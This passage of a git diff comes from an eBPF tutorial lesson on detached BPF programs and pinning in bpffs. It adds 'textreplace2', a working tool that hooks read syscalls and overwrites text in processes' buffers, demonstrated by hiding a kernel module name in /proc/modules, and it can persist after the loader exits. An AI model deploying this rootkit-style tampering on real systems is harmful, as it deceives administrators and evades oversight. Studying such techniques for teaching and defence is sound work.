't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'i': + if (strlen(arg) >= text_len_max) { + fprintf(stderr, "Text must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.input, arg, sizeof(env.input)); + break; + case 'r': + if (strlen(arg) >= text_len_max) { + fprintf(stderr, "Text must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.replace, arg, sizeof(env.replace)); + break; + case 'f': + if (strlen(arg) >= filename_len_max) { + fprintf(stderr, "Filename must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.filename, arg, sizeof(env.filename)); + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Replaced text in PID %d (%s)\n", e->pid, e->comm); + else + printf("Failed to replace text in PID %d (%s)\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct replace_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.filename[0] == '\x00' || env.input[0] == '\x00' || env.replace[0] == '\x00') { + printf("ERROR: filename, input, and replace all requried, see %s --help\n", argv[0]); + exit(1); + } + if (strlen(env.input) != strlen(env.replace)) { + printf("ERROR: 
input and replace text must be the same length\n"); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = replace_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Let bpf program know our pid so we don't get kiled by it + strncpy(skel->rodata->filename, env.filename, sizeof(skel->rodata->filename)); + skel->rodata->filename_len = strlen(env.filename); + skel->rodata->target_ppid = env.target_ppid; + + strncpy(skel->rodata->text_find, env.input, sizeof(skel->rodata->text_find)); + strncpy(skel->rodata->text_replace, env.replace, sizeof(skel->rodata->text_replace)); + skel->rodata->text_len = strlen(env.input); + + // Verify and load program + err = replace_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Add program to map so we can call it later + int index = PROG_01; + int prog_fd = bpf_program__fd(skel->progs.check_possible_addresses); + int ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + index = PROG_02; + prog_fd = bpf_program__fd(skel->progs.overwrite_addresses); + ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + + // Attach tracepoint handler + err = replace_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + replace_bpf__destroy( skel); + return -err; +} diff --git a/28-detach/.gitignore b/28-detach/.gitignore new file mode 100644 index 0000000..81acd4b --- /dev/null +++ b/28-detach/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +textreplace2 diff --git a/28-detach/LICENSE b/28-detach/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/28-detach/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. 
+ +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/28-detach/Makefile b/28-detach/Makefile new file mode 100644 index 0000000..ecfd9e1 --- /dev/null +++ b/28-detach/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. 
+CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/28-detach/index.html b/28-detach/index.html new file mode 100644 index 0000000..aba2c30 --- /dev/null +++ b/28-detach/index.html @@ -0,0 +1,232 @@ + + + + + + BPF的生命周期:使用 Detached 模式在用户态应用退出后持续运行 eBPF 程序 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

    Running eBPF Programs After the User-Space Application Exits: the eBPF Program Lifecycle

    +

    By running eBPF programs in detached mode, the user-space loader can exit without stopping the eBPF programs.

    +

    The Lifecycle of an eBPF Program

    +

    First, we need to understand a few key concepts: BPF objects (programs, maps, and debug information), file descriptors (FDs), and reference counts (refcnt). In the eBPF system, user space accesses BPF objects through file descriptors, and every object carries a reference count. When an object is created, its refcount starts at 1. Once the object is no longer used (that is, no program or file descriptor references it), its refcount drops to 0 and the object is freed after an RCU grace period.
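    As a concrete illustration of this reference counting, here is a minimal user-space sketch (not part of the tutorial code) that creates a map directly and then drops its only reference:

    #include <unistd.h>
    #include <bpf/bpf.h>

    int main(void)
    {
        // Creating a map returns a file descriptor; that fd is the only
        // reference user space holds on the new object (refcount = 1).
        int fd = bpf_map_create(BPF_MAP_TYPE_HASH, "demo_map",
                                sizeof(int), sizeof(long), 128, NULL);
        if (fd < 0)
            return 1;

        /* ... use the map via bpf_map_update_elem(fd, ...) etc. ... */

        // Closing the fd drops the refcount to 0; since nothing else
        // references the map (no program, no pin), the kernel frees it
        // after an RCU grace period.
        close(fd);
        return 0;
    }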

    +

    Next, consider the lifecycle of an eBPF program itself. When you create a BPF program and attach it to some hook (a network interface, a system call, and so on), its reference count increases. From then on, even if the user-space process that originally created and loaded the program exits, the program stays active as long as its refcount is greater than 0. One important point: not all hooks are equal. Some hooks are global, such as XDP, tc's clsact, and cgroup-based hooks; these keep the attached BPF program alive until the underlying object itself goes away. Other hooks are local and only run while the process that owns them is alive.
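    For example, a netlink-based XDP attach is one of those global hooks: the attachment lives on the network device itself rather than on a file descriptor owned by the loader. A hedged sketch, assuming a recent libbpf, an already loaded XDP program fd, and an existing interface index:

    #include <linux/if_link.h>
    #include <bpf/bpf.h>
    #include <bpf/libbpf.h>

    // Attach prog_fd to the interface; once this succeeds, the loader can
    // exit and the XDP program keeps running until it is explicitly detached
    // (bpf_xdp_detach) or the interface disappears.
    int attach_xdp_global(int ifindex, int prog_fd)
    {
        return bpf_xdp_attach(ifindex, prog_fd, XDP_FLAGS_UPDATE_IF_NOEXIST, NULL);
    }

    By contrast, the fentry/tracepoint attachments used in this lesson are link-based: they go away together with the loader's file descriptors unless they are pinned, which is what the rest of this page is about.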

    +

    Another key operation in managing the lifecycle of BPF objects (programs or maps) is detach, which prevents any future execution of an attached program. For cases where a BPF program needs to be swapped out, there is also a replace operation. Replacement is subtle, because you must make sure that no in-flight events are lost, and the old and new programs may briefly run at the same time on different CPUs.
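    With libbpf, these two operations map onto the link API. A minimal sketch, assuming link and new_prog come from an already attached skeleton:

    #include <bpf/libbpf.h>

    int swap_then_stop(struct bpf_link *link, struct bpf_program *new_prog)
    {
        // Atomically point the existing attachment at a new program, so no
        // events are lost during the swap (old and new may still run
        // concurrently on different CPUs for a short moment).
        int err = bpf_link__update_program(link, new_prog);
        if (err)
            return err;

        // Detach: the hook stops firing from now on, but the BPF objects
        // stay alive until their last reference (fd or pin) is gone.
        return bpf_link__detach(link);
    }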

    +

    Finally, besides managing BPF object lifetimes through file descriptors and reference counts, there is another mechanism called BPFFS, the "BPF file system". A user-space process can pin a BPF program or map in BPFFS; pinning increases the object's reference count, so the object stays alive even if the program is not attached anywhere or the map is not used by any program.
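    Pinning is exactly what the textreplace2 loader below does when started with --detach. A one-function sketch of the idea (the path matches the one used later in this lesson):

    #include <bpf/libbpf.h>

    // Pin an attached link into bpffs; the pin adds a reference, so the
    // attachment survives after the loader process exits. Assumes bpffs is
    // mounted at /sys/fs/bpf and the textreplace directory exists.
    int pin_example(struct bpf_link *link)
    {
        return bpf_link__pin(link, "/sys/fs/bpf/textreplace/link_00");
    }

    Removing the pin file later (with rm, or bpf_link__unpin() from a program) drops that reference again, which is why deleting /sys/fs/bpf/textreplace is enough to stop everything.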

    +

    So when we talk about running eBPF programs "in the background", we need to be clear about what that means. In some cases we want the BPF programs to keep running even after the user-space process has exited, and that requires managing the lifecycle of the BPF objects correctly.

    +

    Running the Example

    +

    This lesson reuses the text-replacement application from the previous one to illustrate the potential security risks. By running the program with --detach, the user-space loader can exit without stopping the eBPF programs.

    +

    Compile:

    +
    make
    +
    +

    Before running, first make sure the bpf filesystem is mounted:

    +
    sudo mount bpffs -t bpf /sys/fs/bpf
    +mkdir /sys/fs/bpf/textreplace
    +
    +

    Then you can run textreplace2 detached:

    +
    ./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d
    +
    +

    This will create some eBPF link files under /sys/fs/bpf/textreplace. Once the loader is running successfully, you can check the logs by running:

    +
    sudo cat /sys/kernel/debug/tracing/trace_pipe
    +# confirm that the link files exist
    +sudo ls -l /sys/fs/bpf/textreplace
    +
    +

    Then, to stop it, simply delete the link files:

    +
    sudo rm -r /sys/fs/bpf/textreplace
    +
    +

    References

    + + diff --git a/28-detach/textreplace2.bpf.c b/28-detach/textreplace2.bpf.c new file mode 100644 index 0000000..6778d7c --- /dev/null +++ b/28-detach/textreplace2.bpf.c @@ -0,0 +1,384 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "textreplace2.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to hold the File Descriptors from 'openat' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, unsigned int); +} map_fds SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buff_addrs SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +// NOTE: This should probably be a map-of-maps, with the top-level +// key bing pid_tgid, so we know we're looking at the right program +#define MAX_POSSIBLE_ADDRS 500 +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_name_addrs SEC(".maps"); +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_to_replace_addrs SEC(".maps"); + +// Map holding the programs for tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 1); + __type(key, int); + __type(value, struct tr_file); +} map_filename SEC(".maps"); +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 2); + __type(key, int); + __type(value, struct tr_text); +} map_text SEC(".maps"); + +SEC("fexit/__x64_sys_close") +int BPF_PROG(handle_close_exit, const struct pt_regs *regs, long ret) +{ + // Check if we're a process thread of interest + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + + // Closing file, delete fd from all maps to clean up + bpf_map_delete_elem(&map_fds, &pid_tgid); + bpf_map_delete_elem(&map_buff_addrs, &pid_tgid); + + return 0; +} + +SEC("fentry/__x64_sys_openat") +int BPF_PROG(handle_openat_enter, struct pt_regs *regs) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int zero = PROG_00; + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Get filename to check + struct tr_file *pFile = bpf_map_lookup_elem(&map_filename, &zero); + if (pFile == NULL) { + return 0; + } + + // Get filename from arguments + char check_filename[FILENAME_LEN_MAX]; + bpf_probe_read_user(&check_filename, FILENAME_LEN_MAX, (void*)PT_REGS_PARM2(regs)); + + // Check filename is our target + for (int i = 0; i < FILENAME_LEN_MAX; i++) { + if (i > pFile->filename_len) { + 
break; + } + if (pFile->filename[i] != check_filename[i]) { + return 0; + } + } + + // Add pid_tgid to map for our sys_exit call + bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY); + + return 0; +} + +SEC("fexit/__x64_sys_openat") +int BPF_PROG(handle_openat_exit, struct pt_regs *regs, long ret) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + int pid = pid_tgid >> 32; + + // Set the map value to be the returned file descriptor + unsigned int fd = (unsigned int)ret; + bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY); + + return 0; +} + +SEC("fentry/__x64_sys_read") +int BPF_PROG(handle_read_enter, struct pt_regs *regs) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (pfd == 0) { + return 0; + } + + // Check this is the correct file descriptor + unsigned int map_fd = *pfd; + unsigned int fd = (unsigned int)PT_REGS_PARM1(regs); + if (map_fd != fd) { + return 0; + } + + // Store buffer address from arguments in map + long unsigned int buff_addr = PT_REGS_PARM2(regs); + bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY); + + // log and exit + size_t buff_size = (size_t)PT_REGS_PARM3(regs); + // bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx\n", pid, fd, buff_addr); + // bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_size %lu\n", pid, fd, buff_size); + return 0; +} + +SEC("fexit/__x64_sys_read") +int BPF_PROG(find_possible_addrs, struct pt_regs *regs, long ret) +{ + // Check this open call is reading our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int buff_addr = *pbuff_addr; + long unsigned int name_addr = 0; + if (buff_addr <= 0) { + return 0; + } + + // This is amount of data returned from the read syscall + if (ret <= 0) { + return 0; + } + long int buff_size = ret; + long int read_size = buff_size; + + bpf_printk("[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx\n", pid, read_size, buff_addr); + const unsigned int local_buff_size = 32; + const unsigned int loop_size = 32; + char local_buff[local_buff_size] = { 0x00 }; + + if (read_size > (local_buff_size+1)) { + // Need to loop :-( + read_size = local_buff_size; + } + + int index = PROG_00; + struct tr_text *pFind = bpf_map_lookup_elem(&map_text, &index); + if (pFind == NULL) { + return 0; + } + + // Read the data returned in chunks, and note every instance + // of the first character of our 'to find' text. 
+ // This is all very convoluted, but is required to keep + // the program complexity and size low enough the pass the verifier checks + unsigned int tofind_counter = 0; + for (unsigned int i = 0; i < loop_size; i++) { + // Read in chunks from buffer + bpf_probe_read(&local_buff, read_size, (void*)buff_addr); + for (unsigned int j = 0; j < local_buff_size; j++) { + // Look for the first char of our 'to find' text + if (local_buff[j] == pFind->text[0]) { + name_addr = buff_addr+j; + // This is possibly out text, add the address to the map to be + // checked by program 'check_possible_addrs' + bpf_map_update_elem(&map_name_addrs, &tofind_counter, &name_addr, BPF_ANY); + tofind_counter++; + } + } + + buff_addr += local_buff_size; + } + + // Tail-call into 'check_possible_addrs' to loop over possible addresses + // bpf_printk("[TEXT_REPLACE] PID %d | tofind_counter %d \n", pid, tofind_counter); + + bpf_tail_call(ctx, &map_prog_array, PROG_01); + return 0; +} + +SEC("fexit/__x64_sys_read") +int BPF_PROG(check_possible_addresses, struct pt_regs *regs, long ret) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int newline_counter = 0; + unsigned int match_counter = 0; + + char name[TEXT_LEN_MAX+1]; + unsigned int j = 0; + char old = 0; + + int index = PROG_00; + struct tr_text *pFind = bpf_map_lookup_elem(&map_text, &index); + if (pFind == NULL) { + return 0; + } + + const unsigned int name_len = pFind->text_len; + if (name_len < 0) { + return 0; + } + if (name_len > TEXT_LEN_MAX) { + return 0; + } + // Go over every possibly location + // and check if it really does match our text + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + newline_counter = i; + pName_addr = bpf_map_lookup_elem(&map_name_addrs, &newline_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + bpf_probe_read_user(&name, TEXT_LEN_MAX, (char*)name_addr); + for (j = 0; j < TEXT_LEN_MAX; j++) { + if (name[j] != pFind->text[j]) { + break; + } + } + // for newer kernels, maybe use bpf_strncmp + // if (bpf_strncmp(pFind->text, TEXT_LEN_MAX, name) == 0) { + if (j >= name_len) { + // *********** + // We've found out text! 
+ // Add location to map to be overwritten + // *********** + bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &name_addr, BPF_ANY); + match_counter++; + } + bpf_map_delete_elem(&map_name_addrs, &newline_counter); + } + + // If we found at least one match, jump into program to overwrite text + if (match_counter > 0) { + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + return 0; +} + + +SEC("fexit/__x64_sys_read") +int BPF_PROG(overwrite_addresses, struct pt_regs *regs, long ret) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int match_counter = 0; + + int index = PROG_01; + struct tr_text *pReplace = bpf_map_lookup_elem(&map_text, &index); + if (pReplace == NULL) { + return 0; + } + + // Loop over every address to replace text into + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + match_counter = i; + pName_addr = bpf_map_lookup_elem(&map_to_replace_addrs, &match_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + // Attempt to overwrite data with out replace string (minus the end null bytes) + // We have to do it this long way to deal with the variable text_len + char data[TEXT_LEN_MAX]; + bpf_probe_read_user(&data, TEXT_LEN_MAX, (void*)name_addr); + for (unsigned int j = 0; j < TEXT_LEN_MAX; j++) { + if (j >= pReplace->text_len) { + break; + } + data[j] = pReplace->text[j]; + } + long ret = bpf_probe_write_user((void*)name_addr, (void*)data, TEXT_LEN_MAX); + + // Send event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + int index = PROG_00; + struct tr_text *pFind = bpf_map_lookup_elem(&map_text, &index); + if (pFind == NULL) { + return 0; + } + bpf_printk("[TEXT_REPLACE] PID %d | [*] replaced: %s\n", pid, pFind->text); + + // Clean up map now we're done + bpf_map_delete_elem(&map_to_replace_addrs, &match_counter); + } + + return 0; +} diff --git a/28-detach/textreplace2.c b/28-detach/textreplace2.c new file mode 100644 index 0000000..a59724b --- /dev/null +++ b/28-detach/textreplace2.c @@ -0,0 +1,505 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include +#include +#include +#include "textreplace2.skel.h" +#include "textreplace2.h" + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if 
